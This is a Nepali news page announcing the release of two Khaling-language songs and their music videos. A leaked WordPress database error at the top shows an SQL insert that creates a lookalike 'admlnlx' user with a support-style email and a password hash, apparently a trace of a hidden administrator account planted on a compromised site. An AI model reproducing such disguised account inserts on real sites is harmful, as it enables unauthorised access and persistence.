WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhU5nmB9tmzslag4O.sfO1Hx4.tuHp.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:33:44', '', 'admlnlx', 'admlnlx')

उर्मिला खालिङको नु र वासख्वाम सार्वजनिक (भिडियो सहित) – Gaule Khabar

उर्मिला खालिङको नु र वासख्वाम सार्वजनिक (भिडियो सहित)

उर्मिला खालिङको नु र वासख्वाम सार्वजनिक (भिडियो सहित)

काठमाडौं । उर्मिला खालिङको नु र वासख्वाम दुई गीत सार्वजनिक भएको छ ।

काठमाण्डौ स्थित नवदुर्ग पार्टी भेनुमा किरात खालिङ राई उत्थान संघ केन्द्रीय अध्यक्ष सीताकुमारी खालिङको प्रमुख आतिथ्यमा नयाँ बर्षको अवसरमा खालिङ भाषाको दुई गीत सार्वजनिक भएको हो ।

गायिका खालिङको शब्द, नीर कुमार खालिङको संगीत उर्मिला खालिङ सगै हेमन्त खालिङ, निर कुमार खालिङ र छवि खालिङको स्वर रहेको छ ।
नु(मन)को म्युजिक भिडियोमा तिकल खालिङ र निर्मल खालिङ्ले फिचरिङ गरेका छन भने वासख्वाममा खालिङ कलाकारहरुको सामूहिक वास शिलिलाई देखाइएको छ ।

गाउँले ईन्टरनेटमेन्टको पोस्ट प्रोडक्सनमा निर्मान भएको म्युजिक भिडियोमा छाँयाङ्कन र सम्पान्द गङ्गाराम खालिङ, शृङ्गार बिक्रम गौत, निर्देशन नीर कुमार खालिङको रहेको छ ।

कार्यक्रममा सोलुखुम्बु प्रतिनिधि सभा सदस्य मा.मानवीर राई, माप्यदुधकोशी गाउँपालिका अध्यक्ष बुद्धिकिरण राई, खालिङ संघका पदाधिकारी, बुद्धिजिबि, खालिङ समूदायको बाक्लो उपस्तिथि रहेको थियो ।https://youtu.be/fgqMt4Ks0og

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका